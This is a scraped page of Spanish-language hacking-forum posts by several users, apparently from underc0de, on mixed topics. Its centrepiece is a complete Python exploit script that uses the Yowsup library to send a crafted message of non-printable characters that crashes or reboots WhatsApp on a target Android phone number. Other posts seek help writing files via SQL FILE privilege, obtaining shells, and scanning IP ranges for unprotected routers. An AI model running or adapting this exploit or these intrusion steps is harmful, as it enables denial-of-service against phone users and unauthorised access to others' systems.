Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Cómo puedo realizar una búsqueda de directorios hasta encontrar permisos de escritura ya que tiene permiso FILE eh probado a ciegas de esta manera:Código: text /var/www/html/paginaweb.com/tes.txt
y me salio este error:Código: text Error: Can't create/write to file '/var/www/html/paginaweb.com/tes.txt' (Errcode: 2)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy bueno! Reportaste para el bug bounty??
jaja hielasangre es como drupy, esta en todos lados xD
Saludos!
ex bandida
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
pero yo quiero cambiar la url yo no quiero que sea la misma url
Gracias por su ayuda
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Son mínimas las modificaciones que hay con el code original:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
El message que enviá, le quitas la extensión al config, y los "creditos".
La próxima vez por favor incluye los créditos del autor original del code / URL de la Fuente.
Gracias.
Saludos
Gn0m3
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginEn realidad es el uso de la API de de yowsup
Es similar al desarrollado por la gente de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, lo han tomado de base?
Saludos
Gn0m3
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas noches, me gustaría saber como obtener shells de manera eficaz, algún tutorial bien explicado y tal.
Un saludo.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Que bien hielasangre!! Es muy bueno!
Tenes el enlace de las librerias?
Saludos!
ANTRAX
#!/usr/bin/python
#-*- coding: utf-8 -*
# Title: WhatsApp Remote Reboot/Crash App Android
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.476
# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4
# Date: 26/12/2014
# #RemoteExecution - www.remoteexecution.net
#
# Author Exploit:
# Daniel Godoy @0xhielasangre <[email protected]>
# Credits:
# Gonza Cabrera
#
# Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#
import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
import threading,time, base64
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone: Your full phone number including country code, without '+' or '00'
# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
# on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
# of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
# a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
# or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################
MINE_CONFIG ="config"
def getCredentials(config = DEFAULT_CONFIG):
if os.path.isfile(config):
f = open(config)
phone = ""
idx = ""
pw = ""
cc = ""
try:
for l in f:
line = l.strip()
if len(line) and line[0] not in ('#',';'):
prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
varname = prep[0].strip()
val = prep[1].strip()
if varname == "phone":
phone = val
elif varname == "id":
idx = val
elif varname =="password":
pw =val
elif varname == "cc":
cc = val
return (cc, phone, idx, pw);
except:
pass
return 0
def main(phone):
credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
if credentials:
countryCode, login, identity, password = credentials
identity = Utilities.processIdentity(identity)
password = base64.b64decode(password)
# Custom message that will crash WhatsApp
message = message = "#RemoteExecution??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????6?? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????"
#print countryCode, login, identity, password
wa = WhatsappEchoClient(phone, message)
wa.login(login, password)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("number", help="Phone number to send the crash message")
parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
args = parser.parse_args()
Debugger.enabled = args.verbose
main(args.number)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Loginsubiste un phpinfo, y te fijaste si tiene la funcion mail activada?
Buenas a todos, ya he mandado mails otras veces en php, pero ahora no se en que estoy fallando que no se manda. Dejo el form del html y el codigo php.Código: html5
<form action="correof.php">
<input name="correof">
<button type="submit">Enviar</button>
</form>
correof.phpCódigo: php <?php
$correoreceptor = trim($_POST['correof']);
$asunto = "Prueba";
$mensaje = "Prueba";
mail($correoreceptor, $asunto, $mensaje);
header('Location: xxxxxxxxxxxxxx');
?>
A ver si saben porque es, porque ando loco.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Genial nos vemos por allá entonces!, yo estaré con mi polera de Debian (una polera negra con el logo de Debian)
No se como le haremos pero ahi nos vemos!!
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
No me siento seguro en usar Tor en underc0de por temor a que puedan estar guardando data en el exit node de tor :/ podrían implementar SSL para poder estar mas seguros? no es necesario que sea un certificado comprado pueden hacer uno autofirmado y listo. Si gustan puedo ayudar pero para la seguridad, anonimato y privacidad de los usuarios del foro creo que es necesario.
Saludos,
Dedalo.
Asi que esta mas que bienvenida You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
en lo personal tengo mis dudas respecto a un par de cositas, que voy a aclarar:
por el archivo path.php de la carpeta lib:
crear una clase de esa forma me parece algo no solo innecesario sino incoherente, analicemos un poco las funciones y veamos, encontramos funciones como loadLib y loadConfig, las funciones de por si van completamente en contra del segundo criterio de calidad y el cuarto criterio.
sobre el segundo criterio de calidad:
por definicion:
Robustez es la habilidad de una entidad de software de funcionar aún en condiciones anormales (No especificadas).
desde el vamos estás utilizando require once, lo cual da por sentado el hecho de que exista el archivo que estas requiriendo, el resultado de esto es que ante la falta de dicho archivo nos encontraremos con un error fatal de ejecución, lo que deberías hacer es analizar si el archivo existe y de lo contrario decirle al usuario el problema, ya que además si tienes desactivado display_errors (asumiendo que estás en modo de producción) el resultado va a ser pantalla en blanco sin explicaciones y con detención de ejecución. entonces en la situación de que el archivo de configuracion o alguno de los archivos falle tu programa no tiene una salida concreta.
Pero este en realidad es el menor de los problemas, también está el 4º criterio de calidad
por definición:
Reusabilidad es la habilidad de una entidad de software de ser reusado en conjunto o en parte en la construcción de nuevas entidades
ahora, la pregunta es, como puedes reusar una clase que carga archivos específicos internos? y si no querías cumplir con dicho criterio, con qué motivo hiciste una clase? podrían haber sido dos funciones simples sin necesidad de cargar la memoria con una estructura de tal tipo (innecesaria en realidad).
las cosas deben ser usadas cuando valgan la pena, esa clase si bien tiene el proposito de normalizar o estandarizar las cargas, debería requerir tanto el archivo como el directorio de la ubicación de lo que se decea cargar, no cargar deliberadamente archivos en particular.
Entonces en el cambio de contexto donde se decee cargar otro archivo habrá que alterar el código de la clase path, que es en realidad una dependencia del principal, por el contrario un buen código requeriría la alteración unicamente del contexto.
Sobre el archivo GEO.php deberías analizar el uso que le das a los apostrofes de parseo y a los apostrofes de especificación de literales.
No me parece mal que uses apostrofes de parseo, o apostrofes de literales pero usar apostrofes de parseo y luego concatenación es innecesario, y dado que lo que tu escribes si concatenas son literales no es necesario parsear la cadena, dando un trabajo innecesario al interprete de php que desde el vamos que ya tiene sus propios problemas no es necesario darle más carga innecesaria.
Además crear una clase modelo de objetos que pueden cargar archivos, está mal estructurada, ni siquiera debería ser una clase ¿por qué? si quieres que sea una clase en este casi SI debes implementar singleton dado que de lo contrario podrías crear 30 instancias fantasmas (por dar un numero) que intenten cargar archivos, pero como usas require_once no harán absolutamente nada, ¿por qué razón podría yo crear muchas instancias de un cargador de archivos?, y si usas singleton es porque en realidad no necesitas una clase lo haces de puro gusto.
DB.php quizá este sea el asunto principal.
El controlador PDO ya de por si tiene una estructura similar a una clase, de hecho la forma de trabajar es crear una instancia de pdo obteniendo un objeto hecho y derecho, crear una clase interface intermediaria es innecesario por donde se lo mire, a menos que claro está te topes con lo que noté luego, la clase es únicamente para dotar a PDO de Singleton, algo aberrante, lo que estás haciendo es forzar a la clase a solo poder obtener una instancia, y esto ya de por si es un tema no poco menor, una clase que solo se puede instanciar una vez, trate de analizar lo que estoy expresando, es una clase bastante extraña, dado que el objetivo de una clase es representar un modelo de un objeto, que luego al instanciarlo se transforma en el objeto en particular, pero que sentido tiene crear un modelo de algo que solo hay un objeto particular, en otras palabras, se crean modelos de las cosas dada la variedad que existen, pero si solo existe un objeto de ese tipo, crearle una clase es un poco... dada la explicación anterior usar singleton correctamente es bastante dificil ya que solo se puede usar en algunos casos particulares sin concluir en un código ridículo, dotar a una clase que controla bases de datos (y recalco las S) con singleton, es completamente ridículo, ignoro como se te ocurrió tal cosa, pero aunque solo uses una base de datos, dotar de singleton limita al contexto particular en el que se usa dicho código, por lo que el resultado es una violación clara a uno o más de los criterios de calidad.
Ahora bien, no es mi intención tachar a tu código de horrible ni nada por el estilo, yo mismo suelo evitar la implementación de varios criterios dependiendo del caso en el que esté programando, generalmente no aplico criterios para tirar para arriba, dado el gasto de tiempo que conlleva. ¿Entonces por qué hago esta respuesta?, esto no es una queja de tu código, simplemente son explicaciones de cosas que eventualmente se podrían mejorar, y marcar cosas que son bastante ridiculas y que ocacionalmente hasta yo cometo semejantes ridiculeces por el hecho de que aveces uno no se pone a analizar el código. Entonces diré por que respondo todo ésto, mis textos de explicación suelen ser dificiles de entender, y generalmente suele creerse que el código no puede ser analizado bajo los criterios de calidad que explico en mi blog y que hay bastantes textos, esto pasa al principio y se que hay gente en el foro que tiene estas dudas, esto es casi una demostración de que realmente se pueden aplicar los criterios de calidad al código, y una ilustración para aquellos a los que la teoría les complique la vida.
Saludos!
pd: no es mi intencion ofenderte, concidero que tu código hielasangre está relativamente bien, y que es utilizable, y si quiciera implementarlo es muy probable que usara tu código.
pd2: en lo personal no me agrada para nada el uso de php embebido de la forma en que está en index.php pero tampoco es mala, preferiría etiquetas de php lo más cortas posible.
pd3: interesante aporte al código original fermino.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola, este es mi primer mensaje en este foro.
Estoy haciendo un programa en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, voy mejorandolo poco a poco, me gustaria que alguien me pudiera ayudar con el codigo.
Estoy tratando de buscar ip's a las que yo pueda comprobar si su router esta protegido o no lo esta.
Su funcionamiento es muy basico, introduzco una ip, por ejemplo 100.50.50.1, entonces empieza en 100.50.50.1 y termina en 100.50.50.255.Código: text
Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
n = n + 1
TextBox1.Text = t1.Text & "." & t2.Text & "." & t3.Text & "." & (n)
WebBrowser1.Navigate(TextBox1.Text)
t5.Text = WebBrowser1.ReadyState
End Sub
Le he puesto un Timer1.interval=400.
Funciona como una especie de bucle For ... Next. Pero usando el timer1.
Si lo pongo mas rapido no detecto el mensaje de que cuando llega a una ip que me salga el mensaje del router.
Me gustaria saber como hacer esto y de forma mas rapida.
O que instruccion usar para que me diga si la ip que esta buscando esta viva y en esa ip entonces ver si puedo ver si tiene el router protegido.
Si me pueden decir de algo parecido pero en otro lenguaje pues tambien lo agradecere. Estoy aprendiendo otros lenguajes pero con VB tengo mas practica.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Esta para usarlo
Estaba pensando que en vez de .sql podríamos hacerlo con sqlite asi no crear una db al vicio en el mysql! En estos días veo de hacerlo con sqlite
Si usa PDO lo haces cambiando una línea nada más(PD: Aún no vi el code)...
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Que grande hielasangre!!
Ya le pasaremos a fermino para implementarlo en underc0de!
Te dejo +1 por el aporte!
Saludos!
ANTRAX
